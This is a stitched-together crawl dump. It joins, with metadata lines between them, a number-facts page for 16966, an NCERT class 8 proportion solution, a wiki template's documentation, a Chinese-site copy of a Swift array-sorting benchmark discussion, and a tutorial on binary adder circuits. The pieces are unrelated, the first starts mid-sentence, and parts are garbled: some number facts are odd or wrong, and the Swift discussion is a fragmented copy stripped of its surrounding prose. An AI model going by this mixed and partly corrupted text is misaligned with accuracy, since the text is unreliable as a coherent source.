(16966 / 9 = 1885,1111 = 1885 1/9).\n\n#### Is Prime?\n\nThe number 16966 is not a prime number. The closest prime numbers are 16963 and 16979.\n\n#### Factorization and factors (dividers)\n\nThe prime factors of 16966 are 2 * 17 * 499\nThe factors of 16966 are 1, 2, 17, 34, 499, 998, 8483, 16966.\nTotal factors 8.\nSum of factors 27000 (10034 without the number itself).\n\n#### Powers\n\nThe second power of 16966 is 16966^2 = 287.845.156.\nThe third power of 16966 is 16966^3 = 4.883.580.916.696.\n\n#### Roots\n\nThe square root √16966 is 130,253599.\nThe cube root ∛16966 is 25,695663.\n\n#### Logarithms\n\nThe natural logarithm of No. ln 16966 = loge 16966 = 9,738967.\nThe logarithm to base 10 of No. log10 16966 = 4,229579.\nThe Napierian logarithm of No. 
log1/e 16966 = -9,738967.\n\n### Trigonometric functions\n\nThe cosine of 16966 is 0,170292.\nThe sine of 16966 is 0,985394.\nThe tangent of 16966 is 5,786504.\n\n### Properties of the number 16966\n\nIs a Friedman number: No\nIs a Fibonacci number: No\nIs a Bell number: No\nIs a palindromic number: No\nIs a pentagonal number: No\nIs a perfect number: No\n\n## Number 16966 in Computer Science\n\nCode type: Code value\nNumber of bytes: 16.6KB\nUnix time: Unix time 16966 is equal to Thursday Jan. 1, 1970, 4:42:46 a.m. GMT\nIPv4, IPv6: Number 16966 internet address in dotted format v4 0.0.66.70, v6 ::4246\n16966 Decimal = 100001001000110 Binary\n16966 Decimal = 212021101 Ternary\n16966 Decimal = 41106 Octal\n16966 Decimal = 4246 Hexadecimal (0x4246 hex)\n16966 BASE64: MTY5NjY=\n16966 MD5: bb2825b78d37fef9ecabb1b91a8a6b88\n16966 SHA1: 645b71d515f126bf0bf2ce0c0ab76b99b1ff0af4\n16966 SHA224: a1ee0d382a6fb4d309139e44afdf84e0bc9158922330cba51692fa89\n16966 SHA256: acdf413fc28537565e558fe239ea5b5dd0b5da6447775e4fab75ca8bb3b42c87\n16966 SHA384: 353425bd6eec6831c20a16c2f28811eb0026c5d0fa3e55c62e132d348a00c6b2663cff2948a73551c8708bd4cdf60bf4\nMore SHA codes related to the number 16966 ...\n\nIf you know something interesting about the 16966 number that you did not find on this page, do not hesitate to write us here.\n\n## Numerology 16966\n\n### Character frequency in number 16966\n\nCharacter (importance) frequency for numerology.\nCharacter 1: frequency 1\nCharacter 6: frequency 3\nCharacter 9: frequency 1\n\n### Classical numerology\n\nAccording to classical numerology, to know what each number means, you have to reduce it to a single figure; with the number 16966, the numbers 1+6+9+6+6 = 2+8 = 1+0 = 1 are added and the meaning of the number 1 is sought.\n\n## Interesting facts about the number 16966\n\n### Asteroids\n\n• (16966) 1998 SM63 is asteroid number 16966. 
It was discovered by the Beijing Schmidt CCD Asteroid Program from Xinglong Station on 9/29/1998.\n\n### Distances between cities\n\n• There is a 10,543 miles (16,966 km) direct distance between Guiyang (China) and Nova Iguaçu (Brazil).\n• There is a 10,543 miles (16,966 km) direct distance between Hanoi (Viet Nam) and Medellín (Colombia).\n• There is a 10,543 miles (16,966 km) direct distance between Meerut (India) and Santiago (Chile).\n\n## Number 16,966 in other languages\n\nHow to say or write the number sixteen thousand, nine hundred and sixty-six in Spanish, German, French and other languages. The character used as the thousands separator.\nSpanish: 🔊 (número 16.966) dieciseis mil novecientos sesenta y seis\nGerman: 🔊 (Anzahl 16.966) sechzehntausendneunhundertsechsundsechzig\nFrench: 🔊 (nombre 16 966) seize mille neuf cent soixante-six\nPortuguese: 🔊 (número 16 966) dezesseis mil, novecentos e sessenta e seis\nChinese: 🔊 (数 16 966) 一万六千九百六十六\nArabian: 🔊 (عدد 16,966) ستة عشر ألفاً و تسعمائةستة و ستون\nCzech: 🔊 (číslo 16 966) šestnáct tisíc devětset šedesát šest\nKorean: 🔊 (번호 16,966) 만 육천구백육십육\nDanish: 🔊 (nummer 16 966) sekstentusinde og nihundrede og seksogtreds\nDutch: 🔊 (nummer 16 966) zestienduizendnegenhonderdzesenzestig\nJapanese: 🔊 (数 16,966) 一万六千九百六十六\nIndonesian: 🔊 (jumlah 16.966) enam belas ribu sembilan ratus enam puluh enam\nItalian: 🔊 (numero 16 966) sedicimilanovecentosessantasei\nNorwegian: 🔊 (nummer 16 966) seksten tusen, ni hundre og seksti-seks\nPolish: 🔊 (liczba 16 966) szesnaście tysięcy dziewięćset sześćdziesiąt sześć\nRussian: 🔊 (номер 16 966) шестнадцать тысяч девятьсот шестьдесят шесть\nTurkish: 🔊 (numara 16,966) onaltıbindokuzyüzaltmışaltı\nThai: 🔊 (จำนวน 16 966) หนึ่งหมื่นหกพันเก้าร้อยหกสิบหก\nUkrainian: 🔊 (номер 16 966) шiстнадцять тисяч дев'ятсот шiстдесят шiсть\nVietnamese: 🔊 (con số 16.966) mười sáu nghìn chín trăm sáu mươi sáu\nOther languages ...\n\n## Comment\n\nIf you know something interesting about the 
number 16966 or any natural number (positive integer) please write us here or on facebook." ]
[ null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-1.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-6.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-9.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-6.png", null, "https://numero.wiki/s/senas/lenguaje-de-senas-numero-6.png", null, "https://number.academy/img/braille-16966.svg", null, "https://numero.wiki/img/a-16966.jpg", null, "https://numero.wiki/img/b-16966.jpg", null, "https://number.academy/i/infographics/6/number-16966-infographic.png", null, "https://numero.wiki/s/share-desktop.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.59239507,"math_prob":0.96868277,"size":7159,"snap":"2022-05-2022-21","text_gpt3_token_len":2634,"char_repetition_ratio":0.14772886,"word_repetition_ratio":0.024042742,"special_character_ratio":0.41095126,"punctuation_ratio":0.16179775,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9911332,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,1,null,1,null,1,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-25T22:13:44Z\",\"WARC-Record-ID\":\"<urn:uuid:53f553a0-e4c1-472f-b755-167a72180f67>\",\"Content-Length\":\"40753\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2037cf10-7067-486b-a4b4-f6356e98b31c>\",\"WARC-Concurrent-To\":\"<urn:uuid:b1e60ce1-4fa4-4315-8b4d-9a9a32287c83>\",\"WARC-IP-Address\":\"162.0.227.212\",\"WARC-Target-URI\":\"https://number.academy/16966\",\"WARC-Payload-Digest\":\"sha1:NRSYO7MG636OT7VVDRY26H7ZNEU6FGPT\",\"WARC-Block-Digest\":\"sha1:GSKUTJ4JN7WWB5PTHTHIPMZU7GE2UKIK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662594414.79_warc_CC-MAIN-20220525213545-20220526003545-00252.warc.gz\"}"}
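The base conversions and the numerology digit-reduction listed for 16966 can be reproduced with a short Python sketch (the helper names are mine, not from the page):

```python
def to_base(n, base, digits="0123456789abcdefghijklmnopqrstuvwxyz"):
    """Convert a non-negative integer to its representation in the given base."""
    if n == 0:
        return "0"
    out = []
    while n:
        n, r = divmod(n, base)
        out.append(digits[r])
    return "".join(reversed(out))

def digital_root(n):
    """Repeatedly sum the decimal digits until a single digit remains."""
    while n >= 10:
        n = sum(int(d) for d in str(n))
    return n

# Reproduce the page's figures for 16966.
assert to_base(16966, 2) == "100001001000110"   # binary
assert to_base(16966, 3) == "212021101"          # ternary
assert to_base(16966, 8) == "41106"              # octal
assert to_base(16966, 16) == "4246"              # hexadecimal
assert digital_root(16966) == 1                  # 1+6+9+6+6 = 28 -> 10 -> 1
```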
https://www.cuemath.com/ncert-solutions/q-5-exercise-13-1-direct-and-inverse-proportions-class-8-maths/
[ "# Ex.13.1 Q5 Direct and Inverse Proportions Solution - NCERT Maths Class 8\n\n## Question\n\nA photograph of a bacteria, enlarged $$50,000$$ times, attains a length of $$5 \\,\\rm{cm}$$ as shown in the diagram. What is the actual length of the bacteria? If the photograph is enlarged $$20,000$$ times only, what would be its enlarged length?\n\n## Text Solution\n\nWhat is Known?\n\nBacteria enlarged $$50,000$$ times attain a length of $$5 \\,\\rm{cm.}$$\n\nWhat is Unknown?\n\nActual length of the bacteria.\n\nIf enlarged $$20,000$$ times, what will be the length of the bacteria?\n\nReasoning:\n\nTwo numbers $$x$$ and $$y$$ are said to be in direct proportion if,\n\n\\begin{align}\\frac{x}{y}=k,\\quad x=y\\,k\\end{align}\n\nWhere $$k$$ is a constant.\n\nSteps:\n\n\\begin{align} \\text{Actual length,}\\ l&=\\frac{{{y}_{1}}}{{{x}_{1}}} \\\\ l&=\\frac{5}{50000} \\\\ l&=0.0001\\ \\rm{cm} \\\\ \\end{align}\n\n Number  of  times  enlarged Length attained ${{x_1} = {\\rm{50,000}}}$ ${{y_{\\rm{1}}} = {\\rm{5}}}$ ${{x_2} = {\\rm{20,000}}}$ ${{y_{\\rm{2}}} = {\\rm{?}}}$\n\nThe number of times enlarged is directly proportional to the length attained, so\n\n\\begin{align} {{y}_{2}}&={{x}_{2}}\\times l \\\\ &=20000\\times 0.0001 \\\\ &=2\\ \\rm{cm} \\end{align}\n\nActual length $$= 0.0001 \\,\\rm{cm}$$\n\nEnlarged length will be $$2 \\,\\rm{cm.}$$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6664737,"math_prob":0.9997849,"size":1157,"snap":"2020-10-2020-16","text_gpt3_token_len":379,"char_repetition_ratio":0.15177797,"word_repetition_ratio":0.0,"special_character_ratio":0.40103716,"punctuation_ratio":0.13478261,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9987008,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-07T20:52:15Z\",\"WARC-Record-ID\":\"<urn:uuid:a9acb66b-a9ae-45fc-9d89-326e8fdddabb>\",\"Content-Length\":\"105828\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:901a846a-76a9-4980-b6bd-9603b004a66d>\",\"WARC-Concurrent-To\":\"<urn:uuid:a504d9c9-0fce-4043-ab87-64691b658696>\",\"WARC-IP-Address\":\"52.74.183.11\",\"WARC-Target-URI\":\"https://www.cuemath.com/ncert-solutions/q-5-exercise-13-1-direct-and-inverse-proportions-class-8-maths/\",\"WARC-Payload-Digest\":\"sha1:HZ4JH2AKNEIRXF3WYZYVC3YT7PWIFGEJ\",\"WARC-Block-Digest\":\"sha1:QB7PVBL7CMZE4NPOLW23KVRNWU3AQ6JH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371805747.72_warc_CC-MAIN-20200407183818-20200407214318-00315.warc.gz\"}"}
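The proportion worked in the solution above can be checked numerically; a minimal sketch using exact fractions (variable names are mine):

```python
from fractions import Fraction

# Direct proportion: enlarged length / magnification is constant,
# and that constant is the actual length of the bacterium.
actual = Fraction(5, 50_000)          # 5 cm at 50,000x magnification
assert actual == Fraction(1, 10_000)  # 0.0001 cm

# Length at 20,000x magnification.
enlarged = actual * 20_000
assert enlarged == 2                  # 2 cm, as in the solution
```

Using `Fraction` avoids any floating-point rounding in the equality checks.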
https://informatiestandaarden.nictiz.nl/wiki/Sjabloon:Valid/doc
[ "# Sjabloon:Valid/doc\n\n## Purpose\n\nDetermines whether something is valid in a certain context. Currently only implemented for determining if a number is within the precision that Wikipedia expressions can handle.\n\n## Returns\n\ntrue if the argument is valid, false if it is not.\n\n## Examples\n\n`{{valid|number=A}}` = false (not a number)\n`{{valid|number=1234}}` = true\n`{{valid|number=+1234}}` = true\n`{{valid|number=-1234}}` = true\n`{{valid|number=(1234)}}` = true (one pair of parenthesis is allowed)\n`{{valid|number=--1234}}` = false (incorrect sign use)\n`{{valid|number=1234567890}}` = true\n`{{valid|number=12345678901234567890}}` = false (too large)\n`{{valid|number=1.234567890}}` = true\n`{{valid|number=1.2345678901234567890}}` = false (too many decimals)\n\n## Performance impact\n\nTemplate:Valid returns \"true\" for a valid, single number (2+2 gives \"false\"), and allows scientific notation (such as: -3.45E-07). The precision limit is determined live, for whichever server is formatting the page, typically allowing 14-digit precision (plus trailing zeroes), but it does not detect extreme precision problems dropping minor end-digits:\n\n• cannot reject: -10020030040050000000000000000.70, treated as -1.002003004005E+28\n\nThe template has been written with minimal markup text, and could be used 50,000-13,000 times per page, or less when all 30-digit numbers. Template:Valid is typically used at upper levels of other templates, so it is unlikely to trigger expansion-depth problems. However, it has an expansion-depth of 8 levels, and returns \"false\" if used when nested too deep inside other templates, such as at level 33 when the expansion depth limit is 40." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63470876,"math_prob":0.97486085,"size":1804,"snap":"2023-14-2023-23","text_gpt3_token_len":458,"char_repetition_ratio":0.16055556,"word_repetition_ratio":0.0,"special_character_ratio":0.30044347,"punctuation_ratio":0.12101911,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9746428,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-20T15:09:57Z\",\"WARC-Record-ID\":\"<urn:uuid:c07f6f0e-519f-473a-bfc1-602a10967d17>\",\"Content-Length\":\"20121\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4dbbd6a9-968d-4fb7-962b-2c6028adabbe>\",\"WARC-Concurrent-To\":\"<urn:uuid:15aaccb2-4277-43fe-86cc-2196ca99f9c0>\",\"WARC-IP-Address\":\"37.61.204.124\",\"WARC-Target-URI\":\"https://informatiestandaarden.nictiz.nl/wiki/Sjabloon:Valid/doc\",\"WARC-Payload-Digest\":\"sha1:QZFTJAFBBKZJ2I6RXKVTOEAIR5B2ZZTH\",\"WARC-Block-Digest\":\"sha1:SZZ7RHJ7ZXE5WBJNF63GVRFPPLFC5AJW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296943484.34_warc_CC-MAIN-20230320144934-20230320174934-00479.warc.gz\"}"}
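The template's documented behaviour can be approximated outside wikitext. The Python sketch below is my own rough analogue of `{{valid|number=...}}`, not the template's actual implementation: it accepts one optional sign, one optional pair of parentheses, optional scientific notation, and a 14-significant-digit limit.

```python
import re

# One optional sign, integer part, optional fraction, optional exponent.
_NUM = re.compile(r"^[+-]?(\d+)(?:\.(\d+))?(?:[eE][+-]?\d+)?$")

def valid_number(s):
    """Rough analogue of Template:Valid's number check (my own sketch)."""
    if s.startswith("(") and s.endswith(")"):
        s = s[1:-1]  # one pair of parentheses is allowed
    m = _NUM.match(s)
    if not m:
        return False
    # Count significant digits (leading zeros don't count).
    digits = (m.group(1) + (m.group(2) or "")).lstrip("0") or "0"
    return len(digits) <= 14  # typical precision limit per the doc

assert valid_number("1234") is True
assert valid_number("A") is False                      # not a number
assert valid_number("--1234") is False                 # incorrect sign use
assert valid_number("(1234)") is True
assert valid_number("-3.45E-07") is True               # scientific notation
assert valid_number("1.2345678901234567890") is False  # too many digits
```

Unlike the real template, this sketch does not probe the server's live precision limit; 14 digits is hard-coded from the description above.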
https://includestdio.com/935.html
[ "# Swift performance: sorting arrays\n\n``````let n = 1000000\nvar x = [Int](repeating: 0, count: n)\nfor i in 0..<n {\nx[i] = random()\n}\n// start clock here\nlet y = sort(x)\n// stop clock here``````\n\n``xcrun swift -O3 -sdk `xcrun --show-sdk-path --sdk macosx```\n\n``xcrun swift -O0 -sdk `xcrun --show-sdk-path --sdk macosx```\n\n``````let n = 10000000\nprint(n*n*n*n*n)\nlet x = [Int](repeating: 10, count: n)\nprint(x[n])``````\n\n``````for i in 0..<n {\nx[i] = x[i] ^ 12345678\n}``````\n\n(The XOR operation here is just so that I can find the relevant loop in the assembly code more easily; I tried to pick an operation that is easy to spot but also \"harmless\" in the sense that it does not need any checks related to integer overflow.)\n\n• With `-Ofast` I get almost what I would expect. The relevant part is a loop of 5 machine-language instructions.\n• With `-O3` I get something beyond my imagination. The inner loop spans 88 lines of assembly code. I did not try to understand all of it, but the most suspicious parts are 13 calls of \"callq _swift_retain\" and another 13 calls of \"callq _swift_release\". That is, 26 subroutine calls in the inner loop!\n\n``````let n = 10000\nvar x = [Int](repeating: 1, count: n)\nfor i in 0..<n {\nfor j in 0..<n {\nx[i] = x[j]\n}\n}``````\n\n• C++ -O3: 0.05 s\n• C++ -O0: 0.4 s\n• Java: 0.2 s\n• Python with PyPy: 0.5 s\n• Python: 12 s\n• Swift -Ofast: 0.05 s\n• Swift -O3: 23 s\n• Swift -O0: 443 s\n\n(If you are worried that the compiler might optimize away the pointless loops entirely, you can change them to e.g. `x[i] ^= x[j]` and add a print statement that outputs `x`, but this does not change anything; the timings will be very similar.)\n\n• clang++ -O3: 0.06 s\n• swiftc -Ofast: 0.1 s\n• swiftc -O: 0.1 s\n• swiftc: 4 s\n\n• clang++ -O3: 0.06 s\n• swiftc -Ofast: 0.3 s\n• swiftc -O: 0.4 s\n• swiftc: 540 s\n\ntl;dr: On this benchmark, Swift is now as fast as C when using the default release optimization level [-O].\n\n``````func quicksort_swift(inout a:CInt[], start:Int, end:Int) {\nif (end - start < 2){\nreturn\n}\nvar p = a[start + (end - start)/2]\nvar l = start\nvar r = end - 1\nwhile (l <= r){\nif (a[l] < p){\nl += 1\ncontinue\n}\nif (a[r] > p){\nr -= 1\ncontinue\n}\nvar t = a[l]\na[l] = a[r]\na[r] = t\nl += 1\nr -= 1\n}\nquicksort_swift(&a, start, r + 1)\nquicksort_swift(&a, r + 1, end)\n}``````\n\n``````void quicksort_c(int *a, int n) {\nif (n < 2)\nreturn;\nint p = a[n / 2];\nint *l = a;\nint *r = a + n - 1;\nwhile (l <= r) {\nif (*l < p) {\nl++;\ncontinue;\n}\nif (*r > p) {\nr--;\ncontinue;\n}\nint t = *l;\n*l++ = *r;\n*r-- = t;\n}\nquicksort_c(a, r - a + 1);\nquicksort_c(l, a + n - l);\n}``````\n\n``````var a_swift:CInt[] = [0,5,2,8,1234,-1,2]\nvar a_c:CInt[] = [0,5,2,8,1234,-1,2]\n\nquicksort_swift(&a_swift, 0, a_swift.count)\nquicksort_c(&a_c, CInt(a_c.count))\n\n// [-1, 0, 2, 2, 5, 8, 1234]\n// [-1, 0, 2, 2, 5, 8, 1234]``````\n\n``````var x_swift = CInt[](count: n, repeatedValue: 0)\nvar x_c = CInt[](count: n, repeatedValue: 0)\nfor var i = 0; i < n; ++i {\nx_swift[i] = CInt(random())\nx_c[i] = CInt(random())\n}\n\nlet swift_start:UInt64 = mach_absolute_time();\nquicksort_swift(&x_swift, 0, x_swift.count)\nlet swift_stop:UInt64 = mach_absolute_time();\n\nlet c_start:UInt64 = mach_absolute_time();\nquicksort_c(&x_c, CInt(x_c.count))\nlet c_stop:UInt64 = mach_absolute_time();``````\n\n``````static const uint64_t NANOS_PER_USEC = 1000ULL;\nstatic const uint64_t NANOS_PER_MSEC = 1000ULL * NANOS_PER_USEC;\nstatic const uint64_t NANOS_PER_SEC = 1000ULL * NANOS_PER_MSEC;\n\nmach_timebase_info_data_t timebase_info;\n\nuint64_t abs_to_nanos(uint64_t abs) {\nif ( timebase_info.denom == 0 ) {\n(void)mach_timebase_info(&timebase_info);\n}\nreturn abs * timebase_info.numer / timebase_info.denom;\n}\n\ndouble abs_to_seconds(uint64_t abs) {\nreturn abs_to_nanos(abs) / (double)NANOS_PER_SEC;\n}``````\n\n``````[-Onone] no optimizations, the default for debug.\n[-O] perform optimizations, the default for release.\n[-Ofast] perform optimizations and disable runtime overflow checks and runtime type checks.``````\n\nSeconds for n = 10_000 with [-Onone]:\n\n``````Swift: 0.895296452\nC: 0.001223848``````\n\n``Swift_builtin: 0.77865783``\n\n``````Swift: 0.045478346\nC: 0.000784666\nSwift_builtin: 0.032513488``````\n\n``````Swift: 0.000706745\nC: 0.000742374\nSwift_builtin: 0.000603576``````\n\n``````Swift: 0.107111846\nC: 0.114957179\nSwift_sort: 0.092688548``````\n\n``````Swift: 142.659763258\nC: 0.162065333\nSwift_sort: 114.095478272``````\n\nA new optimization level, -Ofast, is available in LLVM, enabling aggressive optimizations. -Ofast relaxes some conservative restrictions, mostly on floating-point operations, that are safe for most code. It can yield significant performance gains from the compiler.\n\nBETA 3 update:\n\nn = 10_000 with [-O]:\n\n``````Swift: 0.019697268\nC: 0.000718064\nSwift_sort: 0.002094721``````\n\n[-Onone]\n\n``````Swift: 0.678056695\nC: 0.000973914``````\n\n[-O]\n\n``````Swift: 0.001158492\nC: 0.001192406``````\n\n[-Ounchecked]\n\n``````Swift: 0.000827764\nC: 0.001078914``````\n\nTL;DR: Yes, the only Swift implementation available today is slow. If you need fast numeric (and presumably other kinds of) code right now, just go with another language. In the future you should re-evaluate this choice. Still, it is probably good enough for most application code.\n\n``````", null, "", null, "``````\n\nWith `-O3` we get a bunch of `swift_retain` and `swift_release` calls that, honestly, do not look like they should be there for this example. The optimizer should have elided (most of) them AFAICT, since it knows most of the information about the array and knows that it has at least one strong reference to it.\n\n``````import Cocoa\n\nlet swift_start = NSDate.timeIntervalSinceReferenceDate();\nlet n: Int = 10000\nlet x = Int[](count: n, repeatedValue: 1)\nfor i in 0..n {\nfor j in 0..n {\nlet tmp: Int = x[j]\nx[i] = tmp\n}\n}\nlet y: Int[] = sort(x)\nlet swift_stop = NSDate.timeIntervalSinceReferenceDate();\n\nprintln(\"\\(swift_stop - swift_start)s\")``````\n\nPS: I am not an expert on Objective-C, nor on all the facilities from Cocoa, Objective-C, or the Swift runtimes. I might also be assuming some things that I did not write." ]
[ null, "https://includestdio.com/wp-content/uploads/2018/02/ujaJ4aA.png", null, "https://includestdio.com/wp-content/uploads/2018/02/t0s6DsZ.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.7657066,"math_prob":0.99669856,"size":6465,"snap":"2020-24-2020-29","text_gpt3_token_len":3994,"char_repetition_ratio":0.09688903,"word_repetition_ratio":0.038404725,"special_character_ratio":0.3512761,"punctuation_ratio":0.17576317,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9914652,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-11T20:53:08Z\",\"WARC-Record-ID\":\"<urn:uuid:6b484eb1-e6c7-4898-ad78-2f79a362c607>\",\"Content-Length\":\"72011\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b2e4eaf3-1a97-4ac0-92b5-859a4e7e89e3>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d7f3902-adb9-4049-9de7-42de58f416b4>\",\"WARC-IP-Address\":\"101.132.107.155\",\"WARC-Target-URI\":\"https://includestdio.com/935.html\",\"WARC-Payload-Digest\":\"sha1:PVEEQVILXQJFETWZTZ5SWBLQBGTP4UKO\",\"WARC-Block-Digest\":\"sha1:CDVZZZRM443W5QLGIKP5TUS7PF7ARLDX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655937797.57_warc_CC-MAIN-20200711192914-20200711222914-00297.warc.gz\"}"}
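The benchmark's quicksort translates line-for-line into Python; a sketch for reference (not part of the original benchmark code):

```python
def quicksort(a, start, end):
    """In-place quicksort over a[start:end], mirroring the C/Swift versions."""
    if end - start < 2:
        return
    p = a[start + (end - start) // 2]   # pivot from the middle
    l, r = start, end - 1
    while l <= r:
        if a[l] < p:
            l += 1
            continue
        if a[r] > p:
            r -= 1
            continue
        a[l], a[r] = a[r], a[l]         # swap out-of-place pair
        l += 1
        r -= 1
    quicksort(a, start, r + 1)
    quicksort(a, r + 1, end)

xs = [0, 5, 2, 8, 1234, -1, 2]          # same sample input as the article
quicksort(xs, 0, len(xs))
assert xs == [-1, 0, 2, 2, 5, 8, 1234]
```

The partition logic (two cursors walking inward, swapping when both are stuck) is identical to the `quicksort_c` shown above, so its timing can be compared on the same inputs.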
https://learnabout-electronics.org/Digital/dig41.php
[ "# Binary Arithmetic Circuits\n\n• After studying this section, you should be able to:\n• Understand the operation of Binary Adder Circuits.\n• • 4 Bit Parallel Adders.\n• • Twos Complement Overflow.\n• Use Free Software to Simulate Logic Circuit operation.", null, "### Fig 4.1.1 The Half Adder", null, "", null, "### Fig 4.1.1 The Half Adder\n\nBinary arithmetic is carried out by combinational logic circuits, the simplest of which is the half adder, shown in Fig. 4.1.1. This circuit consists, in its most basic form, of two gates, an XOR gate that produces a logic 1 output whenever A is 1 and B is 0, or when B is 1 and A is 0. The AND gate produces a logic 1 at the carry output when both A and B are 1. The half adder truth table is shown in Table 4.1.1 and describes the result of binary addition.", null, "### Fig. 4.1.2 The Full Adder Circuit.\n\n1 plus 0 = 1₂ (1₁₀)\n\nand\n\n1 plus 1 = 10₂ (2₁₀)\n\nThe half adder is fine for adding two 1-bit numbers together, but for binary numbers containing several bits, a carry may be produced at some time (as a result of adding 1 and 1) that must be added to the next column. As the half adder has only two inputs it cannot add in a carry bit from a previous column, so it is not practical for anything other than 1-bit additions.", null, "When 2 or more bits are to be added, the circuit used is the Full Adder, shown in Fig 4.1.2, (blue background) together with its simplified block diagram symbol. This circuit simply comprises two half adders, the sum of A and B from the first half adder is used as input A on the second half adder, which now produces a sum of the first half adder sum (S1) plus any ‘carry in’ from the CIN terminal. Any carries produced by the two half adders are then ‘ORed’ together to produce a single COUT output. The truth table for the circuit is given in Table 4.1.2.", null, "### Fig. 
4.1.3 4−Bit Parallel Adder.", null, "Even the full adder is only adding two single bit binary numbers, but full adders may be combined to form parallel adders, which will add two multi−bit numbers. Parallel adders can be built in several forms to add multi−bit binary numbers, each bit of the parallel adder using a single full adder circuit. As parallel adder circuits would look quite complex if drawn showing all the individual gates, it is common to replace the full adder schematic diagram with a simplified block diagram version.\n\nFig 4.1.3 illustrates how a number of full adders can be combined to make a parallel adder, also called a ‘Ripple Carry Adder’ because of the way that any carry appearing at the carry in input (CIN) or produced when adding any of the 4-bit inputs, ‘ripples’ along the adder stages until a final carry out appears at the carry out output (COUT) of the final full adder for bit A3+B3.", null, "### Fig. 4.1.4 8−Bit Twos Complement Adder/Subtractor.", null, "## 8 Bit Twos Complement Adder/Subtractor\n\nTo carry out arithmetic however, it is also necessary to be able to subtract. A further development of the parallel adder is shown in Fig.4.1.4. This is an 8-bit parallel adder/subtractor. This circuit adds in the same way as the adder in Fig. 4.1.3 but subtracts using the twos complement method described in Digital Electronics Module 1.5 (Ones and Twos Complement).\n\nWhen subtraction is required, the control input is set to logic 1, which causes the bit at any particular B input to be complemented by an XOR gate before being fed to input B of the full adder circuit.\n\nTwos complement subtraction in an 8-bit adder/subtractor requires that the 8-bit number at input B is complemented (inverted) and has 1 added to it, before being added to the 8-bit number at input A. The result of this will be an 8-bit number in twos complement format, i.e. 
with its value represented by the lower 7 bits (bit 0 to bit 6) and the sign represented by the most significant bit (bit 7). The logic 1 on the control input is therefore also fed to the first carry input of the adder to be included in the addition, which for subtraction is therefore:\n\nInput A + Input B + 1\n\n(Here + signifies addition rather than OR)\n\nAlternatively, if addition of A and B is required, then the control input is at logic 0 and number B is fed to the adder without complementing.", null, "### Fig. 4.1.5 XOR Gate Used as a Data Selector.\n\nHow an XOR gate is used here to change the adder into a subtractor by inverting the B inputs can be seen from the truth table for an XOR gate, shown in Table 4.1.3 (in Fig. 4.1.5). Notice that if input A, (used as the CONTROL input) of the XOR gate is at logic 0, then the XOR gate selects input B, but if input A is logic 1, then it selects the inverse of input B (i.e.B).\n\n## Twos Complement Overflow\n\nThe 8-bit adder/subtractor illustrated in Fig. 4.1.4 is designed to add or subtract 8−bit binary numbers using twos complement notation. In this system the most significant bit (bit 7) is not used as part of the number’s value, it is used to indicate the sign of the number (0 = positive and 1 = negative).\n\nNo matter what the word size of a digital system (8-bits 16-bits 32-bits etc.), a given number of bits can only process numbers up to a maximum value that can be held in its designed word length.\n\nDuring arithmetical operations it is possible that adding two numbers (with either positive or negative values) that are both within the system’s limit, can produce a result that is too large for the system’s word length to hold.\n\nFor example, in a twos complement adder such as shown in Fig. 4.1.4, when adding either positive or negative 7-bit values, the result could be larger than 7 bits can accommodate. 
Therefore the result will need to occupy one extra bit, which means that the calculated value will ‘overflow’ into bit eight, losing a major part (128₁₀) of the value and changing the sign of the result.\n\nTo overcome this problem, it is necessary first to detect that an overflow problem has occurred, and then to solve it either by using additional circuits or, in computing, by implementing a corrective routine in software.\n\nFortunately there is a quite simple method for detecting when an overflow occurs. As shown in Fig. 4.1.5 the overflow detection system consists of a single exclusive or (XOR) gate that takes its inputs from the carry in and carry out connections of the bit 7 (sign bit) adder.\n\nWhen the carry in (CIN) and carry out (COUT) bits of this adder are examined, it can be seen that if an overflow has occurred CIN and COUT will be different, but if no overflow has occurred they will be identical.", null, "### Adding Two Positive (In Range) Numbers\n\nTable 4.1.4 shows the effect of adding two positive values where the sum is within the range that can be held in 7 bits (≤127₁₀). The result of adding two positive numbers has produced a correct positive result with no carry and no overflow.", null, "### Twos Complement Subtraction\n\nTable 4.1.5 shows a twos complement subtraction performed by adding a negative number to a positive number. The result is 31₁₀ (within the range 0 to +127₁₀), the sign bit is 0 indicating 